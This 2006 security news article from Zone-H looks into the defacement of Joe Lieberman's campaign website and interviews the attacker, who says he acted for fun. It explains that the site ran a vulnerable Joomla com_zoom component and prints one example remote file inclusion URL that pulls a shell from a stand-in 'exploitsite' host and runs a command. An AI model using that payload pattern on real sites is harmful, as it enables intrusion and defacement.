Advertisement
Home arrow ITsec News arrow The Lieberman campaign site hacking incident. A political opponent's job? Zone-H's truth
Saturday, 30 August 2008
  
 
Last week attacks
O.S.  Defs.  %
Linux  14375  79.28%
Win 2003  2672  14.74%
FreeBSD  574  3.17%
Win 2000  213  1.17%
SolarisSunOS  143  0.79%
Other  156  0.86%

Total attacks: 18133 of which 9051 single ip and 9082 mass defacements

Main Menu
Home
Digital Warfare
Geopolitics
ITsec News
ITsec Advisories
Test Drive
360°
Digital Attacks Archive
Zone-H events
Publications
Zone-H Friends/Partners
Contact Us
Search
Download Area
Zone-H forum
About this website
Login Form





Lost Password?
No account yet? Register
Visitors' Map
The Lieberman campaign site hacking incident. A political opponent's job? Zone-H's truth PDF Print E-mail
User Rating: / 13
PoorBest 
Written by Roberto Preatoni   
Thursday, 10 August 2006

joe_liebermanSenator Joe Lieberman's campaign website has been recently targeted by hacker attacks, at least three time in the last month as reported by Lieberman's office in the last days.

In two cases Lieberman's website got defaced (as you can check by our mirror) and more recently suffered a denial of service attack. On the Lieberman's website we read now a statement about the attacks being "the result of a coordinated attack by our political opponents".

Lieberman is also asking his political opponent Ned Lamont to "make an unqualified statement denouncing this kind of dirty campaign trick and to demand whoever is responsible to cease and desist immediately"

But is this true? Zone-H might have someting to say, at least on the defacement side... 

Judging by a quick glance at Netcraft we can see that is running Linux with:

Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7a PHP-CGI/0.1b

and judging by a quick glance at Google cache  we can see that the site was running Joomla, a common CMS (we also use it, well a bit tweaked...) with a component called com_zoom, a kind of media manager for Joomla. This component is effected by a flaw allowing an attacker to execute arbitrary commands on the target by taking advantage of a file inclusion flaw.

For example:  http://target/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://exploitsite/shell.gif?&cmd=ls

From that point the attacker was probably able to upload a local priviledge escalation exploit such the recent  (and publicly available)  raptor_prctl.

We tried to contact the attacker who disclosed that he indeed attacked Senator Joe Lieberman's website and defaced it, but being a Turkish guy, he really didn't have a clue about who Senator Joe Lieberman was.  Being Muslim we asked him if his attack was anyway politically motivated and the answer was: "I did it just for fun".

Being also asked if he was the coordinator of the Denial of Service attacks which have been effecting Senator Joe Lieberman's site he declared that what he did was just to deface the site, then moving to the next target.


Comments Index (Total Messages: 2)
reax Written by Guest on 2006-08-10 19:15:06
Re: reax Written by Guest on 2006-08-16 18:13:58

Powered by a Zone-H(ified) version of AkoComment 3.0!


DISCLAIMER: Forum postings are the opinion of the posting author alone, and should not be taken as the opinion of Zone-h. The   author is entirely and solely responsible for all content that he/she uploads, posts, or otherwise transmits via the website. Zone-h is not responsible for such content. However, Zone-h shall have the right, but not the obligation, to delete, move, or edit any content that violates this agreement or is otherwise objectionable as determined by Zone-h in its sole discretion and without notice.
 
< Prev   Next >
[ Back ]
Advertisement
 
Top!
© 2008 Zone-H.org
Joomla! is Free Software released under the GNU/GPL License.
 Top!